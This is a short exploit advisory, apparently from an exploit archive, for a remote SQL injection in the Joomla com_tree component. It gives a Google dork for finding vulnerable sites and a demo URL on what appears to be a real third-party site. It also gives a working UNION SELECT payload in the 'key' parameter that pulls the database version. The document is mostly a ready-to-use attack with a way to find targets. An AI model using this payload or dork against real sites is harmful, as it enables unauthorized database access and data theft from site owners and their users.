The Joomla Tree component suffers from a remote SQL injection vulnerability.
5b79dd5a90d9e147da6b08043d3efd1838578b35c505f539a9c84f5074834382
################################################################################################
# Exploit Title: Joomla Component (com_tree) SQL Injection Vulnerability
#
# Author : CoBRa_21
#
# E-Mail : ghost1lover[at]hotmail.com
#
# Google Dork : inurl:index.php?option=com_tree
#
# Demo: http://www.mistrhanky.com/hor/index.php?option=com_tree&Itemid=11&key=77
################################################################################################
#
# Exploit:
#
# http://127.0.0.1/index.php?option=com_tree&Itemid=11&key=77 (SQL)
#
# http://127.0.0.1/index.php?option=com_tree&Itemid=11&key=-77 uNIOn select 0,version(),2--
################################################################################################
# Pentester CoBRa_21 Thanks e-banka.org & cyber-warrior.org & AKINCILAR #
################################################################################################